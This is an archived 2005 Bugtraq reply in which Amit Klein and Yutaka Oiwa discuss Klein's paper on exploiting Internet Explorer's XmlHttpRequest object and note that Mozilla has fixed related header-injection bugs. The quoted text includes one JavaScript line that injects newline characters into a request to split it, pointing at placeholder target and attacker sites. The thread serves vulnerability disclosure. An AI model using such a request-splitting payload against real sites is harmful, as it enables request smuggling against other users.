lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 28 Sep 2005 18:06:49 +0200 From: "Amit Klein (AKsecurity)" <aksecurity@...pop.com> To: bugtraq@...urityfocus.com, Yutaka OIWA <y.oiwa@...t.go.jp> Subject: Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein On 27 Sep 2005 at 21:34, Yutaka OIWA wrote: > Hello Amit, > > "Amit Klein (AKsecurity)" <aksecurity@...pop.com> writes: > > > x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP > > /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target > > .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP > > /1.0\r\nFoobar:","http://www.attacker.site/",false); > > This kind of bugs are already fixed in recent Mozilla browsers, > as shown in your reference [4]. > > > [4] "setRequestHeader can be exploited using newline characters", > > Bugzilla bug 297078 > > https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and > > "XMLHttpRequest allows dangerous request headers to be set", > > Bugzilla bug 302263 > > https://bugzilla.mozilla.org/show_bug.cgi?id=302263 > > see comment #15 of bug 297078. > > https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15 > Oh. I missed this. So - very good. And thanks for bringing this to Bugtraq's and mine attention. And while we're here - kudos for your work! -Amit
Powered by blists - more mailing lists